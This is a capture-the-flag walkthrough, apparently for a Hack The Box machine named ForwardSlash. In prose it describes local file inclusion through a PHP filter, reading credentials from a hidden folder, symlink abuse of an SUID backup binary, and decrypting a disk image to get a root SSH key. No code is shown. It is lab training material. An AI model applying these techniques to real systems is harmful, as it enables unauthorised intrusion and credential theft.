Buy Me A Coffee


Run Nmap scan against the IP

Go to the Website , We Can see the site is redirecting to forwardslash.htb and the site is not loaded

Add forwardslash.htb in the /etc/hosts

Now Again Go to the website we can see the site is loaded

Then i search for directories,but could't find anything so i enumerated subdomains and i found 1 subdomain

Then i Added Subdomain to the /etc/hosts file

Now Searching for Subdomains directories , I got '/dev' folder and
i tried to enumerate sub directories in /dev folder but could't found anything

Go to the '/dev' folder the access is denied

Go to the subdomain ,We can see the Login page with SignUp

SignUp with Creadentials , And Login

You can see an option for Change Profile Picture , Go to the link

You Can see it is disabled and can't do anything

Go to inspect page and remove the disabled option from form tag

You can see the modified form tag , Now the submit button is visible and you can send the request

Now open burp and capture the request

By Forwarding the request it showed up error , so i searched for php filter for LFI and i found this

Now i Added this before the post parameter and i got Base64 encoded string

I decoded the string and i got the /etc/password ,From this we can identify that there are 2 users. 1 is chiv and anotherone is pain

After many enumeration i didn't get much to details, i remember the folder i got early and looked into it and i got Base64 encrypted string

I decoded it and i got chiv password

Using the creadentials i logged into chiv shell

Now Let's Look into the SUID Files , We Can see a file which is owned by pain user

And We can see the accessible file in '/var/backups/' and the config.php.bak is intresting

I run the backup and i got the numbers near ERROR field are changing frequently

Then i checked the config.php.bak file in backup folder,it's permission is denied

I created a bash script to make symbolic link to the file with the number that we are getting with error

After Running the script we got the password for pain

Login to pain with the creadentials we go and read user.txt

Next step is to escalate the priviliage to root, we can see 2 files in encryptorinator folder which is in pain directory

Download the files and check what is happening in the file

Then after some time i think it may giving message to me so i modified the script with if the below code

When i run, I got the directory path and a password

Checking the sudo priviliage in which commands

using cryptsetup to decrypt it and i entered the password that i got with the directory path

And mounted it and ,i got id_rsa file and logged in with root

Got root